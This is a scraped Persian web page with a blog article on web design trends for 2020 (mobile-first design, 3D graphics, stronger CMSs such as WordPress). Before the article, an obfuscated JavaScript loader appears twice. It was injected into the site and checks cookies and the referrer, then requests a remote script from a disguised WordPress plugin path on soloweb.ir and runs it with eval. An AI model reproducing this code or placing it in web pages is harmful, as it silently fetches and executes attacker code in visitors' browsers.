;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//soloweb.ir/wp-content/plugins/RTL-CareUnit/vendor/defuse/php-encryption/src/Exception/Exception.js","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}} ;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//soloweb.ir/wp-content/plugins/RTL-CareUnit/vendor/defuse/php-encryption/src/Exception/Exception.js","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

طراحی وب سایت در سال 2020

گسترش اینترنت و صفحات وب در دنیای امروز غیر قابل انکار است و همه ما می دانیم که طراحی وب سایت روز به روز در حال گسترش است. اما آینده طراحی سایت به کجا می رسد؟ ما باید چه اطلاعاتی داشته باشیم و اگر می خواهیم برنامه نویسی وب را دنبال کنیم، باید چه انتظاراتی از سال 2020 داشته باشیم؟ این سوالی است که ذهن بسیاری از ما را به خود درگیر کرده است و از این روی قصد داریم در ادامه شما را بیشتر با Web Design آشنا سازیم. شما می توانید با توجه به اطلاعاتی که در این زمینه ارائه می شود، با آینده این فرآیند در سال پیش رو بیشتر آشنا شوید و همچنین می توانید برنامه ای دقیق برای یادگیری و یا کسب تجربه در بازاریابی اینترنتی و دیجیتال مارکتینگ داشته باشید که قطعا برنامه نویسی و طراحی سایت یکی از مهمترین اهمیت ها در آن به شمار می رود. پس با ما در ادامه همراه باشید تا بتوانیم آینده طراحی سایت در سال 2020 را مورد نقد و بررسی قرار دهیم.

طراحی وب سایت 2020، موبایل مهم تر است
یکی از مهمترین نکات در زمینه طراحی وب در سال 2020 را می توان ارجح دانستن طراحی وب برای موبایل بر دستگاه های دیگر دانست. باید یک وب سایت سینک برای موبایل، تبلت و کامپیوتر بسازید تا بتوانید در زمینه طراحی وب موفق تر باشید. همچنین بهتر است که به فونت ها و کلمات در طراحی توجه کنید، اسلایدرها باید با موبایل همخوانی داشته باشند و بر اساس نرخ استفاده بالایی که از موبایل جهت مرور صفحات وب می شود، بهتر است که نسخه وب اپلیکیشن سایت خود را نیز داشته باشید که این امر در طراحی سایت در سال 2020 اهمیت بسیار زیادی را به خود جذب می کند. بهتر است طراحان سایت اشتباهات رایج طراحی سایت برای موبایل که ممکن است به وجود آید را کنار بگذارند.

طراحی وب سایت 2020، عناصر گرافیکی، سه بعدی می شوند

دومین نکته بسیار مهمی که در زمینه طراحی وب سایت وجود دارد را می توان سه بعدی شدن عناصر گرافیکی دانست. به طور کلی گرافیک وب سایت ها در حال بهبود است و با توجه به قابلیت هایی که در مرورگرها روز به روز اضافه می شوند، باید وب سایت هایی زیباتر طراحی کنید. به همین جهت توصیه می کنیم در صورتی که در سال 2020 می خواهید وارد عرصه وب شوید، به گرافیک اهمیت بسیار زیادی دهید و در این زمینه اطلاعات مختلف و گوناگون را کسب کنید. طراحی های سه بعدی لایه های مختلف و طرح های کوچک و بزرگ گرافیکی سه بعدی در گوشه و کنار وب سایت شما می توانند جذاب باشند و در جذب مخاطب می توانند بهتر از روش های قدیمی تر عمل کنند. پس گرایش به سمت گرافیک سه بعدی در سال 2020 بیشتر شده است.

حذف فضای کنار سایت
در گذشته مقداری از فضای کنار وب سایت همواره بلااستفاده می ماند و منوها به کاربر نمایش داده می شدند. این در حالی است که در سال های گذشته بسیاری از وب سایت های کوچک و بزرگ طراحی وب سایت خود را با حذف فضای کنار سایت بهبود داده اند و صفحاتی پویا تر را به کاربران نمایش می دهند که می تواند بسیار جذاب باشد. به طور کلی در صورتی که علاقه مند به طراحی سایت هستید و می خواهید وارد این دنیا شوید، بهتر است ایده های جدید را دنبال کرده و بر این اساس نسبت به طراحی سایت اقدام نمایید. این روش می تواند به شما کمک کند تا بهترین طراحی وب سایت را در سال 2020 داشته باشید. با ما در ادامه همراه باشید تا نکات تخصصی تری را در زمینه طراحی سایت در سال 2020 با شما در میان بگذاریم.

CMS ها قوی تر می شوند
پیش بینی می شود که در سال 2020 CMS ها قوی تر می شوند و کسانی که علاقمند به طراحی وب سایت بدون دانش برنامه نویسی هستند می توانند با قدرت بیشتری کار خود را در این زمینه انجام دهند. در صورتی که علاقمند به ورود به دنیای برنامه نویسی هستید اما بهتر است بدانید که در زمینه برنامه نویسی هم می توان به دنبال خبرهای بسیار خوبی بود که البته در ادامه بیشتر در این زمینه صحبت می کنیم. اما CMS هایی مانند وردپرس و جوملا امسال می توانند قدرتمند تر باشند و توانایی طراحی وب سایت با استفاده از این ابزار بسیار بهبود پیدا می کند. همچنین شما می توانید به سادگی یک وب سایت حرفه ای طراحی کرده و آن را برای کسب و کار اینترنتی خود بدون نیاز به دانش برنامه نویسی داشته باشید. پیش بینی می شود که این بهبود به خصوص در زمینه UI و سئو بیشتر قابل لمس باشد.

 

برنامه نویسی ساده تر
با آمدن نسخه های جدیدتر زبان های برنامه نویسی تحت وب، می توانید به سادگی یک وب سایت کامل داشته باشید. به طور کلی می توان گفت که طراحی یک سایت با استفاده از زبان های برنامه نویسی، CSS ها و غیره بسیار ساده تر می شود و انتظار آن را داریم تا برنامه های بیشتری برای درک برنامه و همچنین طراحی خلاقانه تر ارائه شود و در دسترس شما قرار گیرد. در صورتی که سوالی در این زمینه داشته باشید می توانید با متخصصین این امر صحبت کنید.

کلام آخر
دنیای طراحی وب سایت روز به روز در حال گسترش است و شاهد آن هستیم که بسیاری از کسانی که علاقمند به دنیای طراحی وب سایت هستند می توانند در سال 2020 با محدودیت های کمتری به کار خود ادامه دهند. همچنین بهتر است بدانید که این شاخصه ها هر سال اعلام می شوند و معمولا بهبود بیشتری در این زمینه انجام می شود. همچنین می توان گفت که گوگل با به کارگیری الگوریتم BERT تحول جدیدی را در سال 2020 به دنیای سئو و تولید محتوا می دهد، البته باید منتظر باشیم و ببینیم که این تحول به زبان فارسی هم اضافه می شود یا خیر.

مقاله های بیشتر

طراحی وب

فریم ورک چیست ؟

فریم ورک FrameWork که در اصطلاح یک چارچوب نرم افزاری گفته می شود مجموعه ای است از کتابخانه های برنامه نویسی و احتمالا مجموعه ای